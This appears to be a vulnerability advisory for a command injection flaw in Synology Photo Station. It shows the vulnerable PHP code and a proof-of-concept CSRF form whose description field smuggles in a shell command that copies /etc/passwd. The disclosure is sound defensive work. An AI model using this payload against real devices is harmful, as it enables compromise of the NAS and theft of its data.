Command injection vulnerability in Synology Photo Station

Abstract

A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS.

Tested version

This issue was tested on Synology Photo Station version 6.2-2858.

Fix

Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation

Introduction

Synology Photo Station is an online photo album that is managed by DiskStation Manager (DSM). Synology NAS provides the home/photo folder for storing photos and videos that can be viewed via a web browser.

A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver (http).

Details

Photo Station calls other Synology applications (eg, /usr/syno/bin/synophoto_dsm_user) using operating systems commands. It was found that Photo Station does not properly sanitize user input and as a result attackers can inject their own systems commands that will be executed by Photo Station. In particular this issue can be exploited via the description POST parameter. The affected code is listed below:

public static function UpdateDescriptionMetadata($path, **$description**)
{
	//update metadata
	$cmd = sprintf('%s -M"set %s %s" -M"set %s %s" -M"set %s %s" -M"set %s %s" %s', SYNO_EXIFTOOL_FILE,
		"Xmp.dc.description", **$description**,
		"Xmp.photoshop.headline", **$description**,
		"Iptc.Application2.Caption", **$description**,
		"Exif.Image.ImageDescription", **$description**, escapeshellarg($path));
	**@exec($cmd);**
}

As can be observed, this code uses the value of the description parameter to construct an operating system command that is invoked using the exec() PHP function. The user-supplied description is no validated and/or sanitize, rendering Photo Station vulnerable to command injection.

In addition, Photo Station does not protect against Cross-Site Request Forgery (CSRF) attacks. A remote attacker can abuse this and lure a victim into visiting a specially crafted web page to execute arbitrary commands with the privileges of the webserver (http user). As a result an attacker can compromise the targeted Synology NAS, including all stored data.

Proof of concept

The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt.

<html>
  <body>
    <form action="http://<target>/photo/webapi/photo.php" method="POST">
      <input type="hidden" name="id" value="photo&#95;536168696e&#95;53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" />
      <input type="hidden" name="description" value="**| cat /etc/passwd &gt; /var/services/photo/Securify.txt **" />
      <input type="hidden" name="api" value="SYNO&#46;PhotoStation&#46;Photo" />
      <input type="hidden" name="method" value="edit" />
      <input type="hidden" name="version" value="1" />
      <input type="hidden" name="ps&#95;username" value="admin" />
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Vragen of feedback?